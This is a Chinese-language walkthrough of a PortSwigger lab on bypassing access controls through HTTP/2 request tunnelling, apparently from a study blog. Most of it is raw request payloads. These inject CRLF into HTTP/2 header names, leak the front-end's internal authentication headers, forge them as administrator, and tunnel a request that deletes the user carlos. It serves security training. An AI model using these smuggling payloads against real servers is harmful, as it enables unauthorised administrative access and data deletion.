专家-H2请求隧道-绕过访问控制
# 实验室:通过HTTP/2请求隧道绕过访问控制
# 题目
此实验室容易受到请求走私的攻击,因为前端服务器会降级 HTTP/2 请求,并且无法充分清理所传入的标头名称。
若要解决实验室问题,请以administrator用户身份访问/admin中的管理面板,并删除carlos用户。
前端服务器不会复用与后端的连接,因此不易受到经典的请求走私攻击。但是,它仍然容易受到请求隧道 (opens new window)的攻击。
提示
前端服务器会将一系列客户端身份验证标头 (opens new window)追加到所传入的请求中。你需要找到一种方法来泄露这些标头。
- name: 实验室-专家
desc: 通过HTTP/2请求隧道绕过访问控制 >>
avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
link: https://portswigger.net/web-security/request-smuggling/advanced/request-tunnelling/lab-request-smuggling-h2-bypass-access-controls-via-request-tunnelling
bgColor: '#001350'
textColor: '#d112fe'
1
2
3
4
5
6
2
3
4
5
6
# 实操
(目前只有图,文字后面有时间补)
点击 “ACCESS THE LAB” 进入实验室。
: x\r\n
\r\n
\r\n
GET / HTTP/1.1
Host: ...
Foo↓↓↓
HEAD / HTTP/2
Host: ...
Foo: x
GET / HTTP/1.1
Host: ...
Foo: y
1
2
3
4
5
6
7
8
2
3
4
5
6
7
8
Content-Length: 8425
Content-Length: 3299
: x\r\n
\r\n
\r\n
GET /?search=carsaid HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
s=↓↓↓
HEAD /?search=carsaid HTTP/2
Host: ...
Foo: x
GET /?search=carsaid HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
s=: y
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
: x\r\n
\r\n
\r\n
POST / HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
search=↓↓↓
HEAD /?search=carsaid HTTP/2
Host: ...
Foo: x
POST / HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
search=: y
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
: x\r\n
\r\n
\r\n
POST / HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
search=
X-SSL-VERIFIED: 0
X-SSL-CLIENT-CN: null
X-FRONTEND-KEY: 2883079989245042
1
2
3
2
3
HEAD /admin HTTP/2
Host: ...
Foo: x
GET /admin HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
X-SSL-VERIFIED: 0
X-SSL-CLIENT-CN: null
X-FRONTEND-KEY: 2883079989245042
Bar: y
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
HEAD /admin HTTP/2
Host: ...
Foo: x
GET /admin HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
X-SSL-VERIFIED: 1
X-SSL-CLIENT-CN: administrator
X-FRONTEND-KEY: 2883079989245042
Bar: y
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
HEAD /admin HTTP/2
Host: ...
Foo: x
GET /admin HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
X-SSL-VERIFIED: 1
X-SSL-CLIENT-CN: administrator
X-FRONTEND-KEY: 2883079989245042
y
1
2
3
4
5
6
7
8
9
10
11
12
2
3
4
5
6
7
8
9
10
11
12
HEAD /admin HTTP/2
Host: ...
Foo: x
GET /admin HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
X-SSL-VERIFIED: 1
X-SSL-CLIENT-CN: administrator
X-FRONTEND-KEY: 2883079989245042
Bar: y
1
2
3
4
5
6
7
8
9
10
11
12
13
2
3
4
5
6
7
8
9
10
11
12
13
: x\r\n
\r\n
\r\n
GET /admin/delete?username=carlos HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
X-SSL-VERIFIED: 1
X-SSL-CLIENT-CN: administrator
X-FRONTEND-KEY: 2883079989245042\r\n
\r\n
↓↓↓
HEAD /?search=carsaid HTTP/2
Host: ...
Foo: x
GET /admin/delete?username=carlos HTTP/1.1
Host: 0aa7002f03e52da580d7763600490028.web-security-academy.net
X-SSL-VERIFIED: 1
X-SSL-CLIENT-CN: administrator
X-FRONTEND-KEY: 2883079989245042
1
2
3
4
5
6
7
8
9
10
11
12
2
3
4
5
6
7
8
9
10
11
12
编辑 (opens new window)